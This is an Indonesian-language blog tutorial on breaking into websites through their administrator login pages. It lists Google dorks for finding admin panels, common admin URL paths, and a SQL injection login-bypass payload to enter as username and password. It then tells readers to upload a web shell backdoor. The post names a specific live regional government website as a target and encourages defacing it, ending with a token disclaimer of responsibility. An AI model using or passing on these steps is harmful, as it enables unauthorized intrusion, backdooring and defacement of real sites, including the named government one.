Hack website dengan memanfaatkan celah pada halaman login administrator sebuah website.
Bahan-bahan
1. Dork
intext:manager intitle:Admin Login
inurl:/adminpanel/ intitle:manager
inurl:/admin/ intitle:Admin Panel
Selebihnya gunakan otak kalian wkwk:v
2. Username & passwor
- User : ‘ or 1=1 limit 1 — +
- Passwod :’ or 1=1 limit 1 — +
3. Shell backdoor/scrip jso (BISA KALIAN CARI DI GOOGLE, GUA MALES NGETIKNYA)
LANGKAH-LANGKAH
1. Silahkan Kalian gunakan dork di atas tadi, masukan di kolom pencarian. Pilih salah satu website yang menurut kalian rentan.
2. Biar ga kelamaan gua kasih bonus live target:) [ https://disnakertrans.jatengprov.go.id/%5D
3. Masuk ke menu login administrator dengan menambahkan exsploit di belakan link utama website.
- /admin/
- /admin/login.php
- /administrator/login.php
- Dll
4. Pada website yang tadi gua pake eksploit (/admin)
5. Setelah muncul tampilan seperti ini, masukan username dan password (‘ or 1=1 limit 1 — +). Lalu clik tombol MASUK
6. Setelah itu kalian sudah masuk ke halaman administrator website tersebut, silahkan mau di alakan web itu terserah kalian (hati-hati itu web pemerintah😀😀)
Ok.
Sekian tutorial dari gua. Apabila terjadi hal-hal yang tidak di inginkan bukan tanggung jawab saya.
Gunakan dengan bijak ok
Febrian ID 
Tinggalkan komentar